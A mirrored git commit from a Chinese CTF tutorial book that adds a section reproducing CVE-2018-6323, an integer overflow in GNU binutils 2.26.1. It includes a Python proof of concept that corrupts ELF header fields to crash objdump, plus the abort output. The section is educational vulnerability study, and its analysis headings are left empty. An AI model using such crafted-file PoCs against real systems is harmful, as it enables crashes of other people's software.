mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-24 19:21:15 +07:00
add 7.1.7
This commit is contained in:
parent
c9a2f60561
commit
fc5f1837ce
2
FAQ.md
2
FAQ.md
@ -18,7 +18,7 @@ CTF 是网络安全技术人员之间进行技术竞技的一种比赛形式,
|
||||
|
||||
- 有 pdf/epub/mobi 版本吗?
|
||||
|
||||
没有 epub/mobi 版本。暂时有 pdf,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。
|
||||
有,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。
|
||||
|
||||
|
||||
- 我能打印本书或者作为教材教课吗?
|
||||
|
@ -22,6 +22,10 @@ PDF 文件地址:
|
||||
---
|
||||
请查看 [CONTRIBUTION.md](CONTRIBUTION.md)
|
||||
|
||||
常见问题
|
||||
---
|
||||
请查看 [FAQ.md](FAQ.md)
|
||||
|
||||
致谢
|
||||
---
|
||||
请查看 [THANKS](THANKS)
|
||||
|
@ -132,6 +132,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](doc/7.1.4_wget_2017-13089.md)
|
||||
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
|
||||
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
|
||||
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
|
||||
* [八、附录](doc/8_appendix.md)
|
||||
* [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
|
||||
* [8.2 更多 Windows 工具](doc/8.2_wintools.md)
|
||||
|
110
doc/7.1.7_binutils_2018-6323.md
Normal file
110
doc/7.1.7_binutils_2018-6323.md
Normal file
@ -0,0 +1,110 @@
|
||||
# 7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow
|
||||
|
||||
- [漏洞描述](#漏洞描述)
|
||||
- [漏洞复现](#漏洞复现)
|
||||
- [漏洞分析](#漏洞分析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430)
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
## 漏洞复现
|
||||
| |推荐使用的环境 | 备注 |
|
||||
| --- | --- | --- |
|
||||
| 操作系统 | Ubuntu 16.04 | 体系结构:64 位 |
|
||||
| 调试器 | gdb-peda| 版本号:7.11.1 |
|
||||
| 漏洞软件 | binutils | 版本号:2.26.1 |
|
||||
|
||||
编译安装 binutils:
|
||||
```
|
||||
$ wget https://ftp.gnu.org/gnu/binutils/binutils-2.26.1.tar.gz
|
||||
$ tar zxvf binutils-2.26.1.tar.gz
|
||||
$ cd binutils-2.26.1/
|
||||
$ ./configure --enable-64-bit-bfd
|
||||
$ make && sudo make install
|
||||
$ file /usr/local/bin/objdump
|
||||
/usr/local/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=72a5ff5705687fd1aa6ee58aff08d57b87694cb4, not stripped
|
||||
```
|
||||
|
||||
使用 PoC 如下:
|
||||
```python
|
||||
import os
|
||||
|
||||
hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
|
||||
f = open("helloWorld.c", 'w')
|
||||
f.write(hello)
|
||||
f.close()
|
||||
|
||||
os.system("gcc -c helloWorld.c -o test")
|
||||
|
||||
f = open("test", 'rb+')
|
||||
f.read(0x2c)
|
||||
f.write("\xff\xff") # 65535
|
||||
f.read(0x244-0x2c-2)
|
||||
f.write("\x00\x00\x00\x20") # 536870912
|
||||
f.close()
|
||||
|
||||
os.system("objdump -x test")
|
||||
```
|
||||
```
|
||||
$ python poc.py
|
||||
objdump: test: File truncated
|
||||
*** Error in `objdump': free(): invalid pointer: 0x09803aa8 ***
|
||||
======= Backtrace: =========
|
||||
/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb75ef377]
|
||||
/lib/i386-linux-gnu/libc.so.6(+0x6d2f7)[0xb75f52f7]
|
||||
/lib/i386-linux-gnu/libc.so.6(+0x6dc31)[0xb75f5c31]
|
||||
objdump[0x81421cb]
|
||||
objdump[0x8091ab0]
|
||||
objdump[0x809349c]
|
||||
objdump[0x809400a]
|
||||
objdump[0x80522aa]
|
||||
objdump[0x804c17e]
|
||||
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb75a0637]
|
||||
objdump[0x804c38a]
|
||||
======= Memory map: ========
|
||||
08048000-0822c000 r-xp 00000000 08:01 270806 /usr/local/bin/objdump
|
||||
0822c000-0822d000 r--p 001e3000 08:01 270806 /usr/local/bin/objdump
|
||||
0822d000-08231000 rw-p 001e4000 08:01 270806 /usr/local/bin/objdump
|
||||
08231000-08237000 rw-p 00000000 00:00 0
|
||||
09802000-09823000 rw-p 00000000 00:00 0 [heap]
|
||||
b7200000-b7221000 rw-p 00000000 00:00 0
|
||||
b7221000-b7300000 ---p 00000000 00:00 0
|
||||
b7353000-b736f000 r-xp 00000000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
|
||||
b736f000-b7370000 rw-p 0001b000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
|
||||
b7387000-b7587000 r--p 00000000 08:01 141924 /usr/lib/locale/locale-archive
|
||||
b7587000-b7588000 rw-p 00000000 00:00 0
|
||||
b7588000-b7738000 r-xp 00000000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
|
||||
b7738000-b773a000 r--p 001af000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
|
||||
b773a000-b773b000 rw-p 001b1000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
|
||||
b773b000-b773e000 rw-p 00000000 00:00 0
|
||||
b773e000-b7741000 r-xp 00000000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
|
||||
b7741000-b7742000 r--p 00002000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
|
||||
b7742000-b7743000 rw-p 00003000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
|
||||
b7751000-b7752000 rw-p 00000000 00:00 0
|
||||
b7752000-b7759000 r--s 00000000 08:01 139343 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
|
||||
b7759000-b775a000 r--p 00741000 08:01 141924 /usr/lib/locale/locale-archive
|
||||
b775a000-b775c000 rw-p 00000000 00:00 0
|
||||
b775c000-b775e000 r--p 00000000 00:00 0 [vvar]
|
||||
b775e000-b7760000 r-xp 00000000 00:00 0 [vdso]
|
||||
b7760000-b7782000 r-xp 00000000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
|
||||
b7782000-b7783000 rw-p 00000000 00:00 0
|
||||
b7783000-b7784000 r--p 00022000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
|
||||
b7784000-b7785000 rw-p 00023000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
|
||||
bf85b000-bf87c000 rw-p 00000000 00:00 0 [stack]
|
||||
Aborted (core dumped)
|
||||
```
|
||||
|
||||
需要注意的是如果在 configure 的时候没有使用参数 `--enable-64-bit-bfd`,将会出现下面的结果:
|
||||
```
|
||||
$ python poc.py
|
||||
objdump: test: File format not recognized
|
||||
```
|
||||
|
||||
|
||||
## 漏洞分析
|
||||
|
||||
## 参考资料
|
||||
- [GNU binutils 2.26.1 - Integer Overflow (POC)](https://www.exploit-db.com/exploits/44035/)
|
@ -1,8 +1,9 @@
|
||||
# 第七篇 实战篇
|
||||
|
||||
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
|
||||
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
|
||||
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
|
||||
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
|
||||
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
|
||||
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
|
||||
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
|
||||
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
|
||||
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
|
||||
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
|
||||
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
|
||||
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
|
||||
- [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
|
||||
|
17
src/exploit/7.1.7_binutils_2018-6323/poc.py
Normal file
17
src/exploit/7.1.7_binutils_2018-6323/poc.py
Normal file
@ -0,0 +1,17 @@
|
||||
import os
|
||||
|
||||
hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
|
||||
f = open("helloWorld.c", 'w')
|
||||
f.write(hello)
|
||||
f.close()
|
||||
|
||||
os.system("gcc -c helloWorld.c -o test")
|
||||
|
||||
f = open("test", 'rb+')
|
||||
f.read(0x2c)
|
||||
f.write("\xff\xff") # 65535
|
||||
f.read(0x244-0x2c-2)
|
||||
f.write("\x00\x00\x00\x20") # 536870912
|
||||
f.close()
|
||||
|
||||
os.system("objdump -x test")
|
Loading…
Reference in New Issue
Block a user